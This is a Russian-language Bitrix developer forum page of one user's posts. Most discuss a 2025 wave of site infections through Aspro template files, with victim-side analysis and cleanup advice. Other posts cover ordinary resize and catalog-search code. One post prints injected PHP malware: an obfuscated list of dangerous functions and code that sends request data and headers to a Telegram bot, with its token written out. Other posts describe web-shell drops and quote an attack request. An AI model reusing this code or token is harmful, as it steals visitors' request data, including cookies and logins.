Разработчикам

Артём (Все сообщения пользователя)

Заражение сайтов

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

28.08.2025 22:53:33

Цитата
Дмитрий Загайнов написал: Вам не удалось выяснить, кто вставил этот код? Может хостер?

Это случилось, потому в прошлый раз я не до конца дыры убрал. Я по дате изменений файлов делал список и чистил. Но один из злоумышленников был хитер и подменил дату модификации трех файлов. Скопировал дату у соседних нормальных файлов. Нашел, почистил. Больше не всплывало

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

26.06.2025 18:17:31

Сегодня перестала работать авторизация. Ругалось на bitrix/modules/main/include/prolog_before.php

Вот содержимое:

Код

$suspicious = [
'ev' . 'a' . 'l','sy' . 'st' . 'em','pas' . 'sth' . 'ru','ex' . 'ec','she' . 'll_' . 'exec',
    'bas' . 'e64_' . 'decode','she' . 'll','pop' . 'en','pro' . 'c_o' . 'pen','cur' . 'l_e' . 'xec',
    'fop' . 'en','fil' . 'e_ge' . 't_co' . 'nte' . 'nts','ass' . 'ert','pre' . 'g_re' . 'plac' . 'e',
    'php' . 'inf' . 'o','mk' . 'dir','un' . 'link','ch' . 'mod','inc' . 'lud' . 'e',
    'req' . 'uir' . 'e','mov' . 'e_up' . 'load' . 'ed_f' . 'ile','fil' . 'e_pu' . 't_co' . 'nte' . 'nts','rea' . 'dfi' . 'le',
    'soc' . 'ket_' . 'cre' . 'ate','str' . 'eam' . '_soc' . 'ket_cl' . 'ient','cre' . 'ate_' . 'fun' . 'ctio' . 'n',
    'dl(','par' . 'se_' . 'str','ini' . '_se' . 't','err' . 'or_' . 'rep' . 'ort' . 'ing','set' . '_tim' . 'e_li' . 'mit',
    'pro' . 'c_cl' . 'ose','pcl' . 'ose','pcn' . 'tl_' . 'ex' . 'ec','sy' . 'ml' . 'ink','re' . 'nam' . 'e','ch' . 'own', '/etc' . '/pass' . 'wd'
];

function containsSuspiciousRecursive($array, $suspicious) {
    foreach ($array as $k => $v) {
        foreach ($suspicious as $word) {
            if (stripos($k, $word) !== false) return true;
            if (is_string($v) && stripos($v, $word) !== false) return true;
         if (is_array($v) && containsSuspiciousRecursive($v, $suspicious)) return true;
        }
    }
    return false;
}

$headers = getallheaders();

if (containsSuspiciousRecursive($_REQUEST, $suspicious) || containsSuspiciousRecursive($headers, $suspicious)) {
   $data = "METHOD: {$_SERVER['REQUEST_METHOD']}" . PHP_EOL;
   $data .= "TARGET: {$_SERVER['REQUEST_URI']}" . PHP_EOL;
   $data .= "IP: {$_SERVER['REMOTE_ADDR']}" . PHP_EOL;
   $data .= "UA: {$_SERVER['HTTP_USER_AGENT']}" . PHP_EOL . PHP_EOL;
   $data .= "HEADERS:" . PHP_EOL;
   foreach ($headers as $name => $value) {
      $data .= "$name: $value" . PHP_EOL;
   }
   $data .= PHP_EOL . "BODY:" . PHP_EOL . print_r($_REQUEST, true);

    file_get_contents(
        "https://api.telegram.org/bot7783741198:AAG6KTeA-X19Xw4x16sQOm6ZwFUpHQAVd90/sendMessage?" .
        "chat_id=-1002753657432&text=" . urlencode($data)
    );
}

define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);

if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}

require_once(__DIR__."/. ./include.php");

CMain::PrologActions();

Другой информации пока нет.
Я правильно понимаю, что какие-то данные сливались злоумышленникам в телегу?

Перейти

Заражение сайтов

Пользователь 407969 Посетитель Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017	# 31.03.2025 13:06:46 Муслим Садыгов, нужно смотреть логи в момент создания assets
	Перейти

Мета-теги разделов и подразделов каталога

Пользователь 407969 Посетитель Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017	# 24.03.2025 12:43:31 2025 год. Можно больше не ждать доработки. 10 лет! У проблемы ЮБИЛЕЙ!
	Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

12.03.2025 09:21:17

Цитата
Евгений Иванкин написал: У нас опять массовые заражения сайтов на АСПРО

Цитата
Антон написал: оже самое вчера начались появляться файлы. Все дыры были закрыты что были изывестны

У нас всё спокойно. Признаков заражения нет. Прошу отписаться как были загружены новые файлы.
Вполне возможно, что уже начались целевые атаки на основе поиска уязвимостей не АСПРО, а на основе анализа кода конкретного проекта, который мог быть скачан во время предыдущего заражения.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

04.03.2025 10:46:16

Цитата
Александр написал: агенты не выполняются с момента первого взлома

Вероятно у вас агенты работали на кроне и его взломали. Восстановите содержимое файла с кроном до заражения.

Код
/1 * * * /usr/bin/php -f /home/bitrix/www/bitrix/php_interface/cron_events.php

Вот эта запись должна каждую минуту проверять агенты.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

03.03.2025 21:36:11

Цитата
Виктор Дубов написал: siteheads.php

Первый раз про такие файлы читаю. В каких каталогах они у вас были?

Перейти

Заражение сайтов

Пользователь 407969 Посетитель Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017	# 28.02.2025 12:48:38 Александр, /ajax/js_error.txt удалён?
	Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

27.02.2025 12:03:08

Цитата
Олег Пиманов написал: Добрый день! А что значит запускать в режиме просмотра?

Добрый день. Получить список файлов где может быть уязвимость. (все файлы с unserialize без 'allowed_classes)

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

13.02.2025 09:54:58

Цитата
Артём написал: Кто-нибудь анализировал вредноносный код?

Проанализировал код главной нашей модифицированной страницы. Код нацелен на отправку данных из переменной $_SERVER на сторонний ресурс ( в нашем случае это cw1320.hearingtell.com) и получения от него ответа, и в случае получения ответа 200 идёт вывод страницы с этого сайта и выполнение exit. То есть наша главная страница и битрикс даже не загружались. PHP код прерывался после подмены страницы. IP адрес этого сайта (там около 50 000 сайтов на этом ip) заблокирован роскомнадзором в январе. Я очень надеюсь, что этот код не работал.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

11.02.2025 14:21:22

Цитата
Антон Иванов написал: /ajax/form.php

У нас к этому файлу происходит обращение, когда пользователь кликает на кнопку "быстрый звонок", "получить консультацию". После этого пользователю выводится форма указания данных.

Цитата
/form/index.php

А это рудимент скорее всего. Код файла примерно аналогичен /ajax/form.php. Вероятно аспро забыл подчистить его из установочных файлов после другого разработчика (alexkova.market)

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 23:27:25

Цитата
Антон Иванов написал: Я правильно понимаю, что если в логах именно запросы к новосозданным файлам типа 6d097dd98a.php неудачные, тогда защита сработала?Типа "GET /ajax/a9279bd1e7db.php HTTP/1.0" 404

По этому запросу ожидался плохой файл, но его там не оказалось и это хорошо. Либо файл был вами удалён, либо его создание не удалось, либо этот путь одинаковый для всех сайтов, взломов и это просто боты обходят все сайты на наличие этих файлов.
Это всё хорошо, но проверить наличие уязвимостей в аспро всё равно необходимо, даже если в логах 404. Если вы что-то предприняли и пытаетесь проверить сработало ли, то сначала ждёте посещение файлов аспро (корзины, form, error_log_logic.php и т.д), а потом проверяете наличие новых файлов через bash (на данный момент это новые файлы в папке ajax, а также новые index.php в самых разных директориях сайта, но потом этот принцип изменится скорее всего). Мне в этом помогает git на проекте. Можно какую-нибудь оповещалку заколхозить при попытке создания или изменения файлов проекта.

Цитата
Антон Иванов написал: А если такое проходит?45.142.122.46 - - [10/Feb/2025:04:09:45 +0300] "GET /form/index.php?form_id=TABLES_SIZE

Это аспро файл. К нему теперь всегда будут такие запросы приходить и ответ будет всегда 200 при любом раскладе пока у вас Аспро.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 13:27:55

Я полагаю все эти файловые и sql менеджеры размещенные у меня на сервере в файлах типа ajax/7909e3e68924.php или e3e68/index.php в кол-ве 50шт представляют собой "товар". Человек взломал, разместил и продаёт эти доступы в даркнете или просто передал их. А покупатели ссылок, доступов: кто-то порнушные ссылки вставил, чтобы поднять их в поиске или опустить наш сайт в поиск или просто пыль в глаза бросить, чтобы скачать всю базу и т.д...

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 13:22:55

Цитата
Сергей написал: правильно понимаю, что наличие файла js_error.txt — это попытка взлома, но еще не сам взлом сайта?

У меня этого файла не было. Но он создавался, а потом удалялся. Об этом говорит содержимое get запроса злоумышленника unlink($_SERVER[%22DOCUMENT_ROOT%22].%22/ajax/js_error.txt%22)
Поэтому если этого файла у вас нет, то еще не значит что у вас не было взлома.

Если в логах есть хоть один ответ 200 к файлам типа ajax/7909e3e68924.php или e3e68/index.php, то сайт взломан и злые люди получили доступ ко всем файлам и к подключению к базе. Я на пустом сервере пооткрывал многие свои вредные файлы - это разные файловые менеджеры и sql менеджеры.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 12:38:41

Цитата
Zlyuken написал: В /ajax/form.php

не спасёт. Там get запрос. /ajax/form.php?form_id=TABLES_SIZE&url=/ajax/js_error.txt
я добавил false в условия

elseif($form_id == 'TABLES_SIZE' && $url_sizes && false):
if($formType == 'CRM' && false) {

а в error_log_logic.php закомментировал вывод ошибки

Код
//AddMessage2Log(print_r($request->get('data'), true));

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 11:40:29

Дмитрий Дмитрий, у меня около 50 новых файлов разбросанных по всему проекту. upload cache resize_cahe modules templates. Злоумышленник может позднее зайти по любому пути на сайт и запустить ранее отложенный код. Рекомендую проверить сайт на изменения файлов и на новые файлы начиная с 29 января. Кроме папок managecahce cache html_pages и resize_cahe. Их под снос. resize_cahe и html_pages если болезненно удалять как в моём случае, то в них просто найти все файлы отличные от графических, html и проверить их.

Перейти

Заражение сайтов

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

10.02.2025 11:17:11

Кто-нибудь анализировал вредноносный код? Кроме порнушных сайтов к нам загрузили файловый менеджер, через который могли скачать все файлы проекта от пользователя bitrix. В том числе и файлики dbconn settings, в котором содержатся логин и пароль от базы. И соответственно злоумышленники могли скачать всю БД с заказами, паролями и прочим.

Что по паролям пользователей? Они в зашифрованном виде? При скачивании базы они смогут получить пароли? Заказы и персональные данные по-любому утекут в сеть. Вопрос с паролями?

Перейти

Заражение сайтов

Пользователь 407969 Посетитель Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017	# 10.02.2025 10:28:54 Сегодня утром взломали через /ajax/form.php в связке с error_log_logic.php Последний создаёт файл с вредноносным кодом, а первый его запускает Беда прямо какая-то
	Перейти

Как исключить resize_cache из облачного хранилища?

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

29.01.2025 13:05:58

Теоретически не получилось. Практически сработало это

Скрытый текст

Придётся перед ресайзом скачивать оригинал из облака во временный файл. После выполнения этого обработчика, запустится ResizeImageFile и она удалит временный файл.

Перейти

Как исключить resize_cache из облачного хранилища?

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

29.01.2025 09:01:55

В init.php

Код

$oEventManager = \Bitrix\Main\EventManager::getInstance();
$oEventManager->addEventHandler('main', 'OnBeforeResizeImage', "OnBeforeResizeImage");

function OnBeforeResizeImage($arFields, $resizeParams,&$callbackData,&$cacheImageFile,&$cacheImageFileTmp,&$arImageSize)
{
   return true;
}

$oEventManager->addEventHandler('main', 'OnAfterResizeImage', "OnAfterResizeImage");
function OnAfterResizeImage($arFields, $resizeParams)
{
   return true;
}

Попробуйте этот вариант. Модуль облака использует эти события чтобы загружать ресайз в облако. Если мы перехватим эти события и вернём true, то главный модуль пропустить обработчики модуля clouds и ресайз будет локальным. Теоретически

Перейти

ResizeImageGet и облачное хранилище

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

29.01.2025 08:50:02

Артем Житник, Здравствуйте. Получилось решить проблему с отложенным ресайзом в облаке?

Я нашёл настройку COption::GetOptionString("clouds", "delayed_resize") в файле modules/clouds/default_option.php. Но судя по всему это какая-то заготовка, а дальше нужно самому городить функционал по отложенному ресайзу. При включении это опции delayed_resize, фактический ресайз не происходит, а только происходит формирование ссылки в облаке. Страница сайта загружается без картинок, с пустыми ссылками на облако. Непонятное поведение. Логично же что пока картинка не попала в облако нужно выдавать либо оригинал изображения, либо ресайз сделанный временно локально. Но система формирует ссылку, добавляет запись в таблицу b_clouds_file_resize с error_code = 2. Планирую попробовать отловить эту ситуацию в событиях OnBeforeResizeImage или OnAfterResizeImage и заменить ссылку на оригинал либо на ресайз сделанный локально (после загрузки в облако его надо удалить). И посмотреть сколько времени это займёт (беспокоит лишнее обращение к таблице b_clouds_file_resize)

В модуле clouds есть такая функция ResizeImageFileCheck. Она загружает картинку в облако и меняет error_code на 9. Думаю как-то вызывать эту функцию к каждой картинке через ajax/post при посещении посетителя, но без загрузки на выданную страницу. На cron или на агента сажать не хочется. Может быть есть другие более разумные варианты? если на странице 50 фото, то 50 запросов от посетителя тоже не очень.

Перейти

CIBlockElement::GetList поиск по нескольким полям и свойствам привязанных элементов (Товары + SKU)

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

04.08.2023 14:57:02

Нашёл js скрип на размещение с n по m с повторениями. Перевёл в php. Если вбивать 3-4 слова, при поиске по 2-3 полям, то получается от 10 до 50 комбинаций и филтьтров с условием ИЛИ. Всё работает и ищет безошибочно, но естественно тормозит и долго грузится по 10-30 секунд. Поэтому пошёл по запасному пути (костыль): в БД продублировал все ариткулы и поставщиков в торговые предложения и сделал обычный фильтр:
(name = %слово1% или артикул = %слово1% или поставщик= %слово1%)
и
(name = %слово2% или артикул = %слово2% или поставщик= %слово2%)
и
(name = %слово_n% или артикул = %слово_n% или поставщик= %слово_n%)

Перейти

CIBlockElement::GetList поиск по нескольким полям и свойствам привязанных элементов (Товары + SKU)

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

03.08.2023 19:53:13

Цитата
написал: Получается тут второй вариант не работает?

Да. Второй запрос ожидаемо не ищется. Пытаюсь что-нибудь придумать чтобы искался. Пока изучаю комбинаторику) Пытаюсь разместить Поля по Словам с повторением NAME, а другие поля не повторять. И как то все полученные комбинации раскидаю между $arFilter и фильтром подзапроса.

Цитата
написал: А можешь скинуть пример товара, который находится по первому случаю, но не находится по второму?

Пусть будет два товара.
1) Один простой без торговых предложений:
NAME = "Матрас Юниор Детский", VENDOR="фабрикаМатрасов1"

2) второй товар пусть будет с 3 торговыми предложениями. Сам товар (в таблице выводится не должен, т.к. я хочу выводить только его sku)
NAME = "Матрас Взрослый", VENDOR="фабрикаМатрасов1"
и его sku
2.1) NAME = "Матрас Взрослый 200*90", VENDOR=false
2.2) NAME = "Матрас Взрослый 200*120", VENDOR=false
2.3) NAME = "Матрас Взрослый 200*140", VENDOR=false

При вводе в поиск "Матрас фабрикаМатрасов1" сейчас выводится всё: и 1 и 2.1 и 2.2 и 2.3 что и было задуманно
А еще мне нужно чтобы на запрос "Матрас фабрикаМатрасов1 200" выводились 2.1 2.2 2.3. Вот и думаю как это сделать

Перейти

Сменить цвет заливки шапки сайта, Не могу найти информацию по смене цвета заливки шапки сайта

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

03.08.2023 14:01:45

Здравствуйте.
Это всё прописывается в шаблоне сайта, с помощью CSS. Соответственно нужны знания CSS и HTML. Либо покупать готовый шаблон сайта, параметры которого можно настроить в админке обычному пользователю, а не только разработчику.

Перейти

CIBlockElement::GetList поиск по нескольким полям и свойствам привязанных элементов (Товары + SKU)

Пользователь 407969

Посетитель

Сообщений: 34 Баллов: 6 Регистрация: 12.01.2017

03.08.2023 13:53:22

Здравствуйте. Помогите решить загадку. Какую логику можно придумать для ситуации ниже? Нужно сделать поиск по трём полям, одно из которых у SKU, а еще 2 у товара.

Сделал в админке страничку для продавцов-консультантов с прайс-листом и остатками и возможностью быстрого поиска. Торговый каталог состоит из двух инфоблоков: товары (IBLOCK_ID = 129) и их SKU (IBLOCK_ID = 130). В первом есть простые товары (TYPE == 1) и товары со SKU (TYPE == 1)
html-таблица через main.ui.filter и main.ui.grid. Колонки "Имя", "Поставщик", "Артикул" + 5 колонок с остатками по магазинам и цены.

В Таблицу вывожу инфу следующим образом: Сначала один CIBlockElement::GetList по товарам, а потом если это товар со sku, то CIBlockElement::GetList по каждому такому товару.
Примерно так:

Код

$res = CIBlockElement::GetList($sort, $arFilterElement , false, $nav_params, $arSelectElement);
while ($ar_res = $res->GetNext()) {
   if ($ar_res['TYPE'] == 3) {
      $resSKU = CIBlockElement::GetList($sort,$arFilterSKU , false, false, $arSelectSKU);
      while ($arSKU = $resSKU->GetNext()) {
         $arOffers[] = $arSKU;
      }
   } else {
      $arOffers[] = $ar_res;
   }
}
// Далее вывод $arOffers в main.ui.grid

Получается в таблице простые товары + SKU. И нужно искать сразу по полям/свойствам NAME PROPERTY_VENDOR PROPERTY_ARTICLE
Фильтр $arFilterElement и $arFilterSKU формирую вот так:

Код

//     Товар: NAME = Матрас1,            PROPERTY_VENDOR = Фабрика1, PROPERTY_ARTICLE = Артикул1
//    SKU:  NAME = Матрас1 (Размер1), PROPERTY_VENDOR = false,    PROPERTY_ARTICLE = false
//    SKU:  NAME = Матрас1 (Размер2), PROPERTY_VENDOR = false,    PROPERTY_ARTICLE = false
//    SKU:  NAME = Матрас1 (Размер3), PROPERTY_VENDOR = false,    PROPERTY_ARTICLE = false

$arSearch = 'Матрас1 Размер1 Фабрика1 Артикул1';
$arWords = explode(" ", $arSearch);
foreach ($arWords as $word) {
   $arFilterNameAND[] = ['NAME' => '%'.$word.'%'];
   $arFilterVendorOrNameOrArt[] = [
      'LOGIC' => 'OR',
      ['NAME' => '%'.$word.'%'],
      ['PROPERTY_VENDOR' => '%'.$word.'%'],
      ["PROPERTY_ARTICLE" => "%".$word."%"]
   ];
}

$resSubQ2 = CIBlockElement::GetList($sort['sort'],["IBLOCK_ID"=> 130,"ACTIVE" => 'Y',$arQuantityFilter,$arFilterNameAND] , false, false, ['PROPERTY_CML2_LINK']);
while ($ar_resSubQ2 = $resSubQ2->GetNext()) {
   $idsFromSubQueryesWithName[] = $ar_resSubQ2['PROPERTY_CML2_LINK_VALUE'];
}

$resSubQ1 = CIBlockElement::GetList($sort['sort'],["IBLOCK_ID"=> 130,"ACTIVE" => 'Y',$arQuantityFilter] , false, false, ['PROPERTY_CML2_LINK']);
while ($ar_resSubQ1 = $resSubQ1->GetNext()) {
   $idsFromSubQueryesWithoutName[] = $ar_resSubQ1['PROPERTY_CML2_LINK_VALUE'];
}

$arFilterElement = ['IBLOCK_ID' => 129, 'ACTIVE' => "Y"];
$arFilterElement[0]['LOGIC'] = "OR";
$arFilterElement[0][] = ['TYPE' => 1, $arQuantityFilter,$arFilterVendorOrNameOrArt];
if ($idsFromSubQueryesWithName) 
   $arFilterElement[0][] = ['TYPE' => 3, 'ID' => $idsFromSubQueryesWithName];
if ($idsFromSubQueryesWithoutName) 
   $arFilterElement[0][] = ['TYPE' => 3, 'ID' => $idsFromSubQueryesWithoutName, $arFilterVendorOrNameOrArt];

// Фильтр для SKU 
if ($arFilterNameAND) {
   $arFilterSKU = array_merge($arFilterSKU,$arFilterNameAND);
}

Поиск только по 3 полям "Наименование", "Поставщик Товара", "Артикул". Отдельный фильтр на каждое поле не подходит. Нужен именно поиск.
Если запросить без размера (в наименовании sku) "Матрас1 Фабрика1 Артикул1", то всё находит верно
Если запросить с размером (в наименовании sku) "Матрас1 Размер1 Фабрика1 Артикул1", то естественно не находит, так как в SKU нет совпадений по строкам "Фабрика1" "Артикул1".

Никак не могу придумать логику для второго случая. Кто-нибудь может направить в нужное русло?

Я понимаю, что в моём случае запрос через getlist это может быть садомазохизм, и готов рассмотреть другие варианты. Но мне нужны цены, остатки по складам и работа с main.ui.filter и main.ui.grid, а также постраничная навигация. Getlist всё это даёт и прайс на нём я уже сделал и люди активно им пользуются, но вот понадобилось добавить поиск по поставщику для торговых предложений и я попал в тупик. Через фильтр в отдельном поле "поставщик" не подходит. Нужно именно через поиск, так как на смартфонах настраивать фильтры не удобно.

Вопрос возможно решился бы легко, если бы можно было фильтровать по значениям свойств связанных элементов. Я бы просто при выборке sku указал бы артикул и поставщика через свойство привязки к товару. Но в документации указано что фильтровать можно только по значениям ПОЛЕЙ связанных элементов и далее перечисляются некоторые поля.

Самый крайний случай, писать скрипт на cron, чтобы он дублировал свойства поставщик и артикул в торговые предложения. Но это такой костылище))

Перейти

Артём (Все сообщения пользователя)

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером